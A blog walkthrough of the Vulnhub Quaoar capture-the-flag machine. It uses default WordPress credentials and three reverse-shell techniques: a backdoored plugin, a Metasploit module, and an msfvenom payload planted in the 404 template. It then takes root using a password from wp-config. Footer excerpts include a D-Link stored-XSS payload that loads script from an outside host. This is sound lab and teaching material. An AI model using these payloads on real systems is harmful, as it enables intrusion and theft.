Hackfest 2016- Quaoar VM Walkthrough / Writeup

-
 
Vulnhub.com — Quaoar VM Walkthrough 
 Three Different Techniques to exploit a machine








Vulnhub Machine
This VM was made for hack fest 2016 and is listed as very easy. I had this one done in under an two hour with three different Techniques.

Description

Welcome to Quaoar This is a vulnerable machine which is created for http://hackfest.ca/


Difficulty : Very Easy
Tips:
Here are the tools you can research to help you to own this machine. nmap, dirb / dirbuster / BurpSmartBuster, nikto, wpscan, hydra Your Brain Coffee Google :)
Goals: This machine is intended to be doable by someone who is interested in learning computer security There are 3 flags on this machine 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box
  


Different Techniques to Exploit :
  • Reverse Shell Plugin Upload
  • Metasploit Wordpress Exploit Payload
  • Payload post in 404 page

So Start with 1st Technique:-
  • Reverse Shell Plugin Upload
Let’s get started with old faithful, arp-scan for it’s network location.
Command : arp-scan -l





Network Scan through Arp-scan tool
Followed by the obligatory NMAP, lots of interesting things going on here…
Command : nmap -p- (ip)





Scan Ip with NMAP










Although there was lots to see, I went straight for port 80 due to the self proclaimed ‘very easy’ difficulty and fired up nikto. Immediately I can see this is a word press install.
Command : nikto -h (ip)
Nikto Scan in 80 port










So firing up WPScan and enumerating for usernames. we get the default admin entry.
Command : Wpscan — url www.example.com — enumerate u






Where there is a default admin entry there is highly likely to be a default admin password (admin:admin). I didn’t even look at the landing page at this point, going directly to /wordpress/wp-login.php and trying out my theory..





Wordpress login with default credentials










And as you can see we get straight into the WordPress portal..





Finally admin page access










At this stage I decided to create a WordPress plug-in that I could use to generate a reverse shell. Taking the out of the box php back-door from Kali (/usr/share/webshell/php/php-reverse-shell.php) and making the following amendments to it…
Change the ip (local ip) and port on reverse shell php and zip the updated file.





Update the ip and port in reverse shell










The headers are required so when you zip the php file , it will recognise it as a WordPress plug-in and install it. You can see in the below screen grab rev.zip





Upload zip file and Click on install










But if you go to installed plug-ins after this you will see it has actually installed with the plug-in name. Great for obfuscating your back door.





Check on Plugin page as pwn name
 










Netcat its on listen mode
Command : nc -nlvvp port(4444)






Activating the plug-in from here and catching it with a net-cat listener.
Wow :) Session created










A recursive lookup through the /home directories and we find our first flag.
Got First Flag :)










Now I started this post by saying it had many similarities to Stapler, well one of this similarities was the wp-config containing mysql credentials. The thing with these creds is that they indicate not mysql but actual root credentials.





Sql Credentials steal from wp-config file










So assuming shared credentials between the two accounts:
Try to root and we are in as root. There is a flag in /root/ and we already had the other.
Command : su root
Grep the Second Flag










And for the last flag, Check in cron php file.
Location : cd /etc/cron.d/
Command : cat php5
Finally got third Flag :)





2nd Technique :

  • Metasploit Wordpress Payload Exploit
Using the admin username, i was able to access the wordpress admin dashboard with the password ‘admin’.
From here, it was then possible to get a reverse shell using metasploit (exploit/unix/webapp/wp_admin_shell_upload).

Command : use exploit/unix/webapp/wp_admin_shell_upload
Command : show options





Reverse shell upload using metasploit wordpress exploit















Finally Session created










After Session created follow above steps to get the flag :)


3rd Technique :

  • Reverse TCP Payload post in 404 page
I created a php file with the meterpreter payload as shown in the following image:
Command : msfvenom -p php/meterpreter/reverse_tcp LHOST=[ip] LPORT=[PORT] -f raw > shell.php





Create a php shell payload















Copy the php shell code










Then I added the shell code to the 404 page using the wordpress theme editor.
Wordpress Admin > Appearance > Editor > Template





Paste php shell code










I started msfconsole and set up the listener.
Command :
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp






Once I finished, I just forced a 404 error on wordpress by fetching an unexisting post id.






Yupieee :) I got a shell to the server







So now follow 1st Technique to grep flags :)
Job Done……………..

Comments

Post a Comment

Popular posts from this blog

D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting

-
############################## ############################## ########################## # Exploit Title: D-Link DIR-615 Wireless Router — Persistent Cross Site Scripting # Date: 13.12.2019 # Exploit Author: Sanyam Chawla # Vendor Homepage:  http://www.dlink.co. in # Category: Hardware (Wi-fi Router) # Hardware Link:  http://www.dlink.co.in/ products/?pid=678 # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux # CVE: CVE-2019–19742 ############################## ############################## ########################### Reproduction Steps:  — — — — — — — — — — — — — — —  Login to your wi-fi router gateway with admin credentials [i.e:  http://192.168.0.1 ] Go to Maintenance page and click on Admin on the left pannel. Put blind XSS Payload in to the name field — “><script src= https://ptguy.xss.ht ></ script>. This payload saved by the server and its reflected in the user page. Every refresh in the user home pag
Read more

D-Link DIR-615 Wireless Router —Vertical Privilege Escalation - CVE-2019–19743

-
Image
###################################################################################### # Exploit Title: D-Link DIR-615 — Vertical Prviliege Escalation # Date: 10.12.2019 # Exploit Author: Sanyam Chawla # Vendor Homepage: http://www.dlink.co.in # Category: Hardware (Wi-fi Router) # Hardware Link: http://www.dlink.co.in/products/?pid=678 # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux # CVE: CVE-2019–19743 ####################################################################################### Reproduction Steps: Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1 ] Go to the Maintenance page and click on Admin on the left panel. There is an option to create a user and by default, it shows only user accounts. Create an account with a name(i.e ptguy) and change the privileges from user to root(admin) by changing privileges id with burp suite. Privilege Escalation Post Request
Read more

OWASP Top 10 2017 — Web Application Security Risks

-
Image
What is OWASP :  The Open Web Application Security Project ( OWASP ) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. OWASP is an organization filled with security experts from around the world who provide information about applications and the risks posed, in the most direct, neutral, and practical way. Since 2003, OWASP has been releasing the OWASP Top 10 list every three/four years. The list consists of the top biggest Web Application Security Risks according to OWASP. The list is compiled with the latest vulnerabilities, threats and attacks, as well as detection tactics and remediation. OWASP Top 10 project members create the list by analyzing the occurrence rates and the general severity of each threat facing our rapidly evolving application world. Image Source google A-1) SQL INJECTION : W HAT IS IT? Websites and apps occasionally need to run commands on the underlying database or operati
Read more